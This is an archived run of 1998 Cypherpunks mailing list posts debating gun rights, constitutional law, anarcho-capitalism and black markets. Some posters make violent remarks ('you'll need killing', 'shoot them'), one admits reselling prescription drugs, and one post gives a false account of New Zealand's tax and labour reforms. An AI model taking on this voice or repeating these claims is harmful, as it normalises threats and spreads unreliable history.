In-Reply-To: <Pine.LNX.3.93.981110192449.3952E-100000@millennium-cafe.com>
Message-ID: <199811111320.FAA09439@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Without endorsing Tim's "need killing" views, I would like to point out
that Mr. b!X has a deeply flawed understanding of the Second Amendment and
constitutional history.

-Declan



At 08:35 PM 11-10-98 -0800, Tim May wrote:
>At 7:25 PM -0800 11/10/98, b!X wrote:
>>Yeah yeah all very well and good parody except that the 2nd amendment
>>contains the word "well-regulated" and the 1st doesn't.
>>
>>(And yes I know I'm asking for a shitstorm of trouble saying that on THIS
>>list of all places).
>>
>
>No, you are welcome to _say_ damned near anything you want to say.
>
>However, graduate from _saying_ things to grabbing our guns, that's when
>you'll need killing.
>
>
>--Tim May
>
>Y2K: A good chance to reformat America's hard drive and empty the trash.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Licensed Ontologist         | black markets, collapse of governments.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 23:45:53 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Question about insurance managed fire services... (fwd)
Message-ID: <199811111515.JAA24410@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 15:59:32 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Re: Question about insurance managed fire services...

> You really are naive, Jim. Do you think that insurance regulatory 
> agents follow around after all of the insurance companies' employees
> to ensure they aren't starting fires?

No, and exactly how you managed to derive that is truly humorous.

> Or do you suppose that in an anarcho-capitialistic society (unlike 
> the current sainted `democratic' society), company A would be so
> stupid as to make the burning of competitors' houses an official
> company policy which would be found out `if only' there were a 
> government regulator watching it? How long do you suppose that
> company A can get away with burning down the homes of its competitors

Until somebody either squeels (not likely since they're dead shortly
afterward or let loose and nobody will hire then from then on, not
in the business' best interest.) or they do get caught and a connection is
made (not very likely since the perp won't be carryin an employee badge).
And since company A is the company that will be prosecuting (their own
under-the-table employee) the consequences are pretty predictible.

How commen is it now for business' to partake in illegal activities in order
to further their business ends? How often do you suppose, given that rate,
they are caught? I'd say not a lot. I see no reason to suspect that in a
anarcho-whatever society that rate will be one whit better.

> before its agents are caught in the act (by company B's investigators
> if no one else)?

Oh, they'll get caught occassionaly but then again, the strategy of forcing
company B to keep investigators on call and monitoring their customers
property is a good strategy to raise their cost of doing business and as
a result their coverage rates. This increase will help convince user of
B's service that A looks like a better bang for the buck.

> No, Jim, such behavior would clearly not be in the
> best interests of company A's stockholders (that is, it would not be
> `profitable').

Sure it would, it decreases the cost of doing business and increases
the potential market for future consumers of the services. It happens all
the time now, it won't go away.

> Any why, in a private contractual situation, would the `fire department'
> not be impartial? How does the government-provided fire department
> have any advantage in impartiality?

Because their funds and income is from a known source. Ask yourself this,
what happens if a police officer or a fire inspector suddenly starts driving
a Porche around and moving out into the uppity neighborhoods and doesn't
have a good explanation for it?

> The police or security force that the customer contracts with to
> protect their home of course. Idiot. These exist now in cooperation
> with government-provided police (though some might naively imagine 
> them to be redundant). Either you are simply being disingenuous or
> you really are this stupid.
> 
> >                                  You mean the ones the same insurance
> > company co-oped?
> 
> Context, Jim, context. This makes no sense whatsoever without more
> context. What insurance company are you talking about? And why does
> an insurance company necessarily have a direct relationship with a 
> security service provider? Or did you mean `co-opted' (a different
> word altogether)?

Apparently I've strained your short-term memory here, go back and read
it again. Which insurance company is obvious - all of them.

I'm done now, this isn't about anarcho-anything, this is about you getting
your jollies off trying to take cheap shots at me personaly.

Whoopie.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 11 Nov 1998 08:06:50 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811101638.KAA18839@einstein.ssz.com>
Message-ID: <3.0.5.32.19981111093855.008672b0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 10:38 AM 11/10/98 -0600, Jim Choate wrote:
>
>Like I said, at least your more honest than the rest of these wanna-be
>thieves.

Your earlier reply on honesty was to Petro, I think you are confusing me
with him.

>You might want to see doctor about that hole you shot in your foot while
>it was in your mouth.

Huh?

Reeza!

	If you see a man approaching you with the obvious intention 
	of doing you good, you should run for your life.
				-stolen from a cypherpunk sig




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 00:20:44 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: ebanking - What's up with that?
Message-ID: <199811111539.JAA24547@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Anyone got a pointer other than the CNN article on the announcement by
Excite Inc. and Bank One about their offering a full line of banking
services online?

I'd be interested in anything on the particulars of the services and he
protocols they intend to impliment.

Danke.

    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Wed, 11 Nov 1998 22:15:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: most of what govts do can be done by business, and done better (Re: How to solve the tax problem w/o anarchy or force)
In-Reply-To: <199811102039.UAA09523@server.eternity.org>
Message-ID: <3649A4FF.3631965C@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote:
> 
> Vladimir Nuri writes:
> > the distinction between govt and business is sometimes an
> > arbitrary one. for example govt agencies typically contract
> > with private companies to perform govt services. a massive
> > example of this is the defense industry. what I would tend
> > to propose is a system where this is augmented and finetuned
> > to the point the govt become a very efficient sorting mechanism
> > for channeling money to businesses that are the most efficient.
> 
> Even when government does sub-contract, the inefficiency is usually I
> think pretty horrendous by industry standards:
>  ...
>  ...
> > it really does seem to me like there is a legitimate role for a
> > certain amount of money to be collected for govt service.
> 
> I think you can privatise everything.  Things which are called natural
> monopolies could be managed by trade organisations or companies
> bidding for management getting efficiency related fees.  Why should
> politicians and the rest manage roads, why not a company.
> 
> > imho it is far, far less than whatis being collected today.
> 
> zero I think woudl be best, or very very close.
> 
> > if taxes were 5-10% people wouldn't give as much a damn about the
> > govt and how it worked.
> 
> What all could you spend 5-10% of GNP on that couldn't be privatised?
> Sounds like an awful lot of legalised theft yet!
> 
> > libertarians tend to be awfully realistic some times. who pays for
> > roads when everyone uses them?
> 
> don't pay not allowed to use.  not everyone uses them to drive cars
> on.
> 
> 
There is a real live example of this kind of transition.  New Zealand.

New Zealand is the nation that coined the term 'cradle to grave
socialism' (and also the first to offer women the vote --
coincidence?).  In 1986, the country was as close to bankrupt as was
possible to be.  The socialists were ousted and taxes slashed from 60+%
to 28%.  A GST was introduced, government monopolies were sold off --
mail delivery, post offices, power generation, water supplies, telephone
service, ports, airports, medical, road maintenance etc. Military
investment was reduced to a coast guard and a professional
infrastructure required for UN involvement.

The (almost) immediate result of this divestiture, was for affluence to
skyrocket due to the release of the entrepreneurial spirit (remember the
kiwi-fruit?) By the early '90s New Zealand was upgraded from 17th
standard of living in the world, to 3rd. Since then, taxes have been cut
thrice more.  Currently income taxes are at 21% and plans have been made
to eliminate them entirely in '00.  The entire economy is supported by
the GST of 12.5% (consumption tax).

Welfare still exists, although the population is steadily being weaned
off it.  Most of the diehard dole-bludgers have moved to Australia
(coinciding with a move of many businesses from Australia in the reverse
direction), which still has a 45% income tax rate to support them.  Much
to the chagrin of the doomsaying socialists, the standard of living
actually improved for all the population.  The atmosphere of economic
repression was replaced by cheerful optimism within 6 months of the
transition, and has been growing ever since. Currently, along with
Argentina, New Zealand is the only other country in the world to be in
the black.

Income taxes were kept on solely for the purpose of eliminating foreign
debt. This is due to be completed by '00.  The change in people's
attitudes has been radical. During the latest asian economic crisis, New
Zealand found itself severely affected by the decrease in its markets. 
Rather than a return to printing money and increased taxation, New
Zealand has further reduced its tax burden in the belief that the free
market will find the correct solution.

One other interesting change happened at the same time as the above. 
During the post world war II period, New Zealand (and Australia) were
afflicted by something that was known down-under as the 'English
disease' -- viz: trade unionism.  This second government was virtually
abolished in New Zealand by the passing of the Employment Contracts Act
of 1986.  Under this act, all people are considered to be self-employed
in the sense that everyone has the right to negotiate their own
employment contract, or to collectively bargain as they see fit. What
this means, is that there is no single standard of employer to employee
relationship defined by the government (or trade union).  For a
corporation to require exclusivity of its hired help is considered to be
an invalid employment contract under the act. Consequently, becoming an
'employee' in this sense implies that the income, derived from such
employment, is tax free.  This has been tested in the courts
successfully on a number of occasions.

Several benefits have ensued from this: firstly, everyone has developed
an understanding of how to organize their own financial affairs to
minimize their tax burden; secondly, being self-employed means the 20%
tax rate can be largely reduced through business write-offs; thirdly,
negotiation of contracts, in such an atmosphere, has largely eliminated
the 'us and them' mentality between the corporation and the worker.  Now
it is just a lot of independent co-operating peer companies; fourthly,
because there are no 'bosses' as such, people have a lot more latitude
on how and where they perform their work.  This has led to an incredible
amount of home office and business de-centralization and flexibility.

Its not yet perfect by libertarian standards, but the direction has been
chosen towards a model of government limited to an arbitration function
and to provide a common foreign policy.

My belief is that the creation of a libertarian environment in the US,
is unlikely without much social disruption and bloodshed.  Similarly for
the EU.  A more productive course of action is for libertarian minded
folk, to relocate themselves to countries that are amenable to such
changes in direction (Max! where can we go? Argentina maybe?), and work
to effect the creation of a showcase example of how it can work in
practise.  With the examples of New Zealand and Argentina and the growth
in their stability and affluence, this would be a constructive means of
affirming your libertarian beliefs, without violating the principle of
not initiating force, fraud or coercion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Licence <dlicence@dataforce.co.uk>
Date: Thu, 12 Nov 1998 22:59:12 +0800
To: "'cypherpunks@toad.com>
Subject: acceptable user policies
Message-ID: <01BE0D59.BC79C560.dlicence@dataforce.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



hey there,

	I am having to formulate an acceptable user policy for the users. Does 
anybody know of any online references, or examples of such policies. 
This would have to include specifications like email use, internet 
access, games over the LAN - anything that you can get your head around 
pertaining to such. This of course would have to weigh up between the 
rights of the users and protection of the network and PCs


	Your help would be greatly appreciated
	Duncan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Licence <dlicence@dataforce.co.uk>
Date: Fri, 13 Nov 1998 00:15:52 +0800
To: "'cypherpunks@toad.com>
Subject: acceptable user policies
Message-ID: <01BE0D59.D688E9E0.dlicence@dataforce.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



hey there,

	I am having to formulate an acceptable user policy for the users. Does 
anybody know of any online references, or examples of such policies. 
This would have to include specifications like email use, internet 
access, games over the LAN - anything that you can get your head around 
pertaining to such. This of course would have to weigh up between the 
rights of the users and protection of the network and PCs


	Your help would be greatly appreciated
	Duncan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 12 Nov 1998 00:57:42 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed (fwd)
Message-ID: <199811111618.KAA24654@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 12 Nov 1998 00:06:22 +1000
> From: Reeza! <howree@cable.navy.mil>
> Subject: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed

> Notice how, in each of the amendments below, the 1st is the only one with
> the text "congress shall make no law".
> 
> This is implied, understood to be implied, accepted as implied and supreme
> court ruled to be implied as applicable to each of the rest of the bill of
> rights, and later to the amendments, wherein it is not so specified as in
> the 1st.
> 
> A large part of the reason that 2 thru 10 and the rest do not include that
> phrase is to prevent the states from doing the very thing that congress was
> and is prohibited from.

Read the 10th again you don't understand what it is saying. 

It *specificaly* says that unless the Constitution assigns it to the feds
*or* prohibits it then the states are *exactly* the ones that are able to do
what Congress is prohibited from doing. The states are limited by their
own consititions which are guaranteed to be representative in nature.

The states absolutely have the right to regulate gun laws (as in the Texas
constitution) provided they don't infringe (what part of shall not do you
not understand) on the actual possession. Licenses and background checks
at the state level are absolutely constitutional.

State regulation on speech, press, etc. are also completely constitutional
as well. And is where such regulation should take place. If you don't like
your states laws move to one you do like.

That's what it means to live in a democracy, freedom of choice - not
homogeneity (on this point ol' Alex was wrong, wrong, wrong).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 01:28:06 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811110037.SAA20949@einstein.ssz.com>
Message-ID: <v04011702b26e8687c946@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:37 PM -0500 11/10/98, Jim Choate wrote:
>Forwarded message:
>	No, I am saying that since EVERY government at one time or another
>> treats its citizens like roaches, it's time to radically change the nature
>> of it so that it basically can't be called a government any more.

>The problem isn't government, it's the people who enforce the government
>that abuse it.

	And the system protects them. Pinochet wasn't handed over to spain
now was he.

	It's the system.

>> >Well actualy it's whether it has a tax stamp whether you sell it out of a
>> >storefront or a truckbed is irrelevent. Considering the number of
>>people wh=
>
>> 	Wanna bet?
>
>Absolutely. I happen to know a whole passel of beer, wine, and liqour
>makers. Austin as aswim in micro-breweries. I'd be more than happy to pass
>your email address to the enibriated set and let them argue the point with
>you.

>> 	Most states have fairly strict laws concerning where liquor can be
>> sold.
>
>Actualy it's not the states (at least Texas and Louisiana), it's the local
>cities. The state of Texas doesn't care as long as you pay your liquor
>license and don't sell to minors and obey the local zoning ordinances.

	In N.C, Tennesee (IIRC), Illinois, and North Carolina (especially
N.C.) it's the state.

>> 	Which is completely irrelevant as to wheter or not it is currently
>> black market or not, which is the context I was working in.
>>
>> 	Stay on target.
>
>I am on target. The fact that a unregulated alcohol industry led to death,
>debilitation, and financial hardship justified the imposition of regulation
>on alcohol and its related operations.

	Crap. Pure B.S. What lead to it's regulation was a bunch of broads
who didn't want ANYONE drinking, so they pushed for abolition, which was a
total disaster, and lead to repeal.

>You just don't want the entire picture painted because it cast a harsh light
>on the premise that un-regulated economies are good things.

	While you keep repeating lies and half truths.

	Ever heard of "Muckraking"? Yellow Journalism? Could it have been
that that lead to some of this B.S. regulation? Nah, the press never would
have done something like that.

	Remember the movie "Reefer Madness", and the Jim Crow drug laws of
the early 1900's? Couldn't be that people in positions of power at the time
had certain agendas and used lies to further them could it.

	Nah, people in government NEVER behave like that.


>> >Not necessarily. The doctor has to have a medicaly supportable reason to
>> >dispence those drugs. Otherwise it's just as black market as Joe's.
>> 	Quibble Quibble. You know EXACTLY what I meant.
>Yeah, you meant to commit an act of ommission so that your position looks
>more favorable than it actualy does.

	No I didn't, EVEN IF I GET THEM LEGALLY, if I turn around and sell
them, it's black market, that was muy fucking point, I'm sorry if you can't
comprehend that sort of thing.

	Let me tell you a true story Jimmy. A while back I had a bit of
surgery done to repair a hernia. The Doctor gave me a perscription for a
pain killer (related to valium IIRC). 40 caps of it.

	I hated the shit, and didn't take it after the 2nd day, leaving me
clear headed, but in pain. No big deal, I've been in pain before. I traded
the rest of those drugs for an old computer.

	I got them thru the "white" market, with just cause, and legally (I
had never taken that kind of thing before and didn't know it's effects),
but I "recycled" them thru the black market.

	Either way, my point is still that the black market is about more
than just if the _product_ is illegal, it also relates to the trade.

>> >Didn't think of theft? Jesus H. Christ, you gotta be on Joe's drugs. The
>> >vast majority of material sold on *ANY* black market is stolen from its
>> >rightful owner. It is *the* example of black market trading that most folks
>> >think of first.
>>
>> 	No, the vast majority (in terms of dollars) of stuff sold on the
>> black market is Drugs.
>
>Really? Drugs are what $10B US a year or so. I bet stolen automobiles when

	Yeah, like anyone really knows for sure.

>taken as a whole gross more loss than that. And what makes you think that
>the vast majority of that drugs aren't purchased at the street level with

	Because I know a lot of people who've bought drugs, and for the
most part it was with money they earned or receieved thru legal means.

>> >How the hell do you sell something on the black market if you don't have
>> >possession of it? And exactly who is going to prosecute anyone for
>> 	Easy, it's called a Con.
>> 	Seriously tho, I said that the _selling_ of stolen goods might not
>> be illegal, but the possesion of such things, and the stealing of them are
>> seperate acts to the selling of them.
>Still doesn't answer my question.

	Your question is ignorant and irrelevant, but to answer it: Brokers.

	I have something to sell, but I don't want to hassle with finding a
buyer. Joe has a lot of connections, but no goods to sell, and you are a
buyer. I let joe know I have product, he makes the deal, and I hire Omar to
deliver it to you. Joe never even sees the merchandise, but is effectively
the seller.

>> 	There isn't a need to. Shoot them.

>Ah, so you admit that the general mechanism to settle inter-personal dispute
>under your plan is to allow people to run around shooting each other.

	No, and for you to even say it in that manner is complete
disingenious. You and I are having and "inter-personal dispute", and would
never suggest that you be shot for disagreeing with me. Nor would I if,
say, we had a car accident and were resolving that (unless you had done
something like driving drunk and blatantly violating common sense rules of
the road like running a stop sign or a red light, in which case you are a
threat to me and others). On the other hand, I catch you in my home
uninvited, I hope your life insurance is paid up. I catch you with MY
property without my permission, I hope your medical insurance is good,
cause you are going to be in a LOT of pain.

>Well, at least we've got an honest admission that murder would be legal in
>this system.

	Murder is a legal construct. It is "killing in violation of the
law" (no, that isn't the legal defination of murder, I realize that), if
you don't have "law", you don't have murder. If you have law, then murder
is illegal.

	You are talking about killing, and in cases (i.e. those not covered
by law) killing is legal. If I accidentally hit someone with a car, and
they die, that is not murder. If am a cop and shoot someone, it isn't
murder. If I am rich and famous (come on, you know the song, sing along
"Murder is a crime, unless it is done by a police man, or an Aristocrat
Know your rights, these are your rights...) and stab someone, it is not
murder, and if I kill someone (in most states) illegally entering my house,
it is not murder.

	Hell, in texas, I can shoot my wife, as long as she is in bed with
another person.

--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 12 Nov 1998 01:29:06 +0800
To: cypherpunks@toad.com
Subject: Cylink Sued for Stock Fraud
Message-ID: <199811111641.LAA06325@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Business Wire reported yesterday that Cylink has been
sued in US District Court of New Jersey for securities
fraud through a class action. It alleges misrepresentation 
and false financial statements.

   http://jya.com/cylink-suit.htm

On November 5 Cylink announced revised revenues
for the first half of 1998. The day before William Crowell, 
ex-NSA, was appointed president in a house sweep 
of the executive team, apparently after discovery of book 
cooking.

William Perry, ex-DoD, is still listed on the board of
directors, although the list seems to be out of date,
along with the annual report and letter to stockholders
on Cylink's Web site.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <lcottrell@anonymizer.com>
Date: Thu, 12 Nov 1998 03:58:10 +0800
To: cypherpunks@cyberpass.net
Subject: Anonymizer developer positions available.
Message-ID: <v03102807b26e98e570a3@[209.75.197.18]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Anonymizer Inc. <http://www.anonymizer.com> is looking for programers to
work on various projects under development.

We have two positions available, one short term contract work, the other
full time.

Contract programmer:
Term: 1-2 months
Skills: Visual Basic, Windows API, TCP networking

Full time development team leader:
Skills: C / C++
	PERL
	UNIX
	TCP Networking / sockets


For either position send email and resume to me at <lcottrell@anonymizer.com>.
We are looking for people who share our passion for free speech and privacy.

	-Lance Cottrell

Lance M. Cottrell                  lcottrell@anonymizer.com
Anonymizer, Inc. 		   President
Voice: (619) 667-7969              Fax: (619) 667-7966
www.Anonymizer.com


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNknmc8VB0soGGMVrEQIHZwCg8LUShD1hd+EUHbWewgyDbWv0mlUAniBO
MXykZTIrYLEIE1F8HskuLhLz
=CZu9
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 12 Nov 1998 02:43:32 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811111750.LAA25041@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 10:49:23 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	And the system protects them. Pinochet wasn't handed over to spain
> now was he.
> 
> 	It's the system.

No, it's the British system. And to be honest it should be the American
system also. A country should have jurisdiction only within its own borders.
Other countries should have agreements about how persons accussed of crimes
should be extradited.

In the anarcho-whatever system this is all eliminated because we've
eliminated crime in the first place by legitimizing any and all strategies.

> 	In N.C, Tennesee (IIRC), Illinois, and North Carolina (especially
> N.C.) it's the state.

Then have the law changed in those states or you could move to Texas.

> 	Crap. Pure B.S. What lead to it's regulation was a bunch of broads
> who didn't want ANYONE drinking, so they pushed for abolition, which was a
> total disaster, and lead to repeal.

No, that was prohibition. The taxation of alcohol goes back equaly far in
the history of this country. To before the articles of confederation even
since Britian required taxes on rum and related items - espcialy if they
were from non-British ports -  if you would stop knee-jerking responces and
think back the Tax Acts were one of the reasons we had a revolution in the
first place. Tea, rum, and whiskey were one of the primary motivations.

> 	Ever heard of "Muckraking"? Yellow Journalism? Could it have been
> that that lead to some of this B.S. regulation? Nah, the press never would
> have done something like that.

Actualy, the fact that you admit that the press can be in colussion with the
government and the businesses goes a long way toward demonstrating that
anarcho-anything won't work because it will be even harder for
whistle-blowers and 'social do-gooders' to get their message out (unless
they're well heeled and don't mind loosing it all in the process).

> 	Remember the movie "Reefer Madness", and the Jim Crow drug laws of
> the early 1900's? Couldn't be that people in positions of power at the time
> had certain agendas and used lies to further them could it.

People always have agenda's (this is segues nicely into what Blanc was
saying about attitudes), that's my point and one of the reasons that
anarcho-whatever won't work is because it doesn't recognize this nor does it
put any sort of limit on its expression.

> 	Nah, people in government NEVER behave like that.

People always behave that way, it's the way people are. Being in government
is only another mechanism it gets expressed through. Business is another.

> 	No I didn't, EVEN IF I GET THEM LEGALLY, if I turn around and sell
> them, it's black market, that was muy fucking point, I'm sorry if you can't
> comprehend that sort of thing.

If the doctor gives them to you without a valid medical reason then you
didn't get them legaly. Techicaly the doctor is in violation for trafficking
and you would be in violation for possession and use of a controlled
substance. If you knew full well that you weren't going to use them and took
them anyway then you in effect stole them because you misled the doctor into
giving them to you. Now if you simply sold them because you didn't like their
side effects then only you are legaly culpible.

Now, your point that not everything on the black market is stolen is well
take as I've said before (you just didn't read it, it at least explains why
you keep going over the same issue until you think I'll be badgered into
agreeing with you). The exception I take, and am still waiting for refuation
of, is that the *majority* of goods on the black market including drugs are
related to the theft of material or services from legitimate parties. That
you don't seem to grasp (and I'm not so obsessed with making you see it that
I'm going to discuss the issue farther).

As a history teacher once said:

The nice thing about America is anybody can believe anything, whether they
know what they are talking about or not.

I respect that sentiment.

> 	I hated the shit, and didn't take it after the 2nd day, leaving me
> clear headed, but in pain. No big deal, I've been in pain before. I traded
> the rest of those drugs for an old computer.

I certainly hope that no DEA agents are watching *and* you're not in the
US. Admitting to a crime in a public venue, whether in a public park or a
mailing list isn't the brightest strategy. If you're not in the US you
should probably hope that the NSA (or whomever) is too busy to pass along
this to the requisite authorities. I would suggest strongly that for future
such public admission you should use a pseudonym or an anonymous remailer.

> 	Either way, my point is still that the black market is about more
> than just if the _product_ is illegal, it also relates to the trade.

It has to do with something being illegal or not acceptable otherwise you
could just open up a store and start trading the items directly. In the vast
majority of cases it involves the theft of services or property from the
valid rights holder.

> 	Yeah, like anyone really knows for sure.

Well that pretty much shoots a hole in your point as well if that is your
position. However, since the manufature of vehicles is accounted far to
at least the 10's place by auto manufacturers and the sale of legitimate cars
is traceable through tax and title I'd say that it is possible to make
educated guesses about the scale of the market.

> 	Because I know a lot of people who've bought drugs, and for the
> most part it was with money they earned or receieved thru legal means.

No, you know some people who have bought drugs, just as I do. However,
claiming that the small set you know of personaly qualifies as a lot is an
invalid hyperbole. There are millions of drug users in this country, and
in your entire life you've only met a few thousand at best.

> 	Your question is ignorant and irrelevant, but to answer it: Brokers.

Oh, you mean fences...

> 	I have something to sell, but I don't want to hassle with finding a
> buyer. Joe has a lot of connections, but no goods to sell, and you are a
> buyer. I let joe know I have product, he makes the deal, and I hire Omar to
> deliver it to you. Joe never even sees the merchandise, but is effectively
> the seller.

You have to have possession in order to pass possesion to Joe so that he can
sell it and pass you possession of the receipted funds (minus Joe's cut).
Whether that possession is measured in immediate physical control (ie in
your pants pocket) or more general (eg stored in a rent-room under an
assumed name) is irrelevant.

There is also the fact that if you don't produce the item(s) at some point
Joe is likely to take his frustration out on you because you tried to
take him and his money. The fact that you can produce them is clear evidence
that at some point they were in your possession.

How many middle-men is between there is irrelevant, since you are driving it
and paying the costs you are in possession.

> 	No, and for you to even say it in that manner is complete
> disingenious.

Your the one who said shoot them, what's the matter find your baby to ugly
to look at?

 You and I are having and "inter-personal dispute", and would
> never suggest that you be shot for disagreeing with me. Nor would I if,

Yeah, well unless you can convince everyone that anarcho-whatever will
also convince the Kennedy boys, OJ, et ali. then it's pretty irrelevant
since it will occur whether you or I are involved and the issue is that
it occurs, not that you or I are involved.

I suspect that the emotionaly challenged will continue to shoot each other
irrespective of the political system implimented. If you take guns away
they'll knife each other and if you take knives away they'll beat each other
to death.

Which raises an interesting point, more people are killed by physical
assault according to the FBI crime stats than guns each year.

> say, we had a car accident and were resolving that (unless you had done
> something like driving drunk and blatantly violating common sense rules of
> the road like running a stop sign or a red light, in which case you are a
> threat to me and others).

Ah, I see. So your position is that if somebody runs a stop light then that
is grounds to shoot them.



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 12 Nov 1998 02:46:00 +0800
To: mmotyka@lsil.com
Subject: Re: Off Topic But Truly Beautiful
In-Reply-To: <3648B332.19DA@lsil.com>
Message-ID: <199811111809.MAA14591@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



>From careful reading of the disclaimer at the bottom of the article,
it seems to me that it was a hoax.

igor
Michael Motyka wrote:
> 
> 
> I didn't think of this before but add together bees, wind and rampant
> tree sex and this stuff will definitely spread. It could even become a
> bit of a "problem".
> 
> The people who have packets of seeds should distribute those quickly to
> friends before the buggerers get the mailing list and start confiscating
> seeds.
> 
> BTW - I believe that citrus hybridize freely, rather like mentha in that
> respect.
> 
> Wild and cool. I think he should do apples next. Then strawberries.
> Peaches. Beans. A whole fucking farmer's market.
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Thu, 12 Nov 1998 02:54:25 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811110052.SAA21018@einstein.ssz.com>
Message-ID: <v04011709b26f62998043@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:52 PM -0500 11/10/98, Jim Choate wrote:
>Forwarded message:
>> 	Really, you are saying they couldn't possibly recognize the
>> benefits of teaming up and co-locating fire stations, or that they wouldn't
>> sub-contract to a company that handled fires?
>So, you want to sub-contract out which is going to raise the cost and
>doesn't alleviate the insurance company from regulatory and supply issues.
>It'd cost a fortune.

	Sub-contracting can often lead to cost savings. For instance,
instead of each insurer having their own fire station network, they could
all share one, and only pay a certain cost-per-subscriber.

	Kind of like today where insurers don't usually own hospitals &
doctors offices.
>> 	"reasonable" in cost? There is a LOT if inefficiency in the system
>> that competition could eliminate.
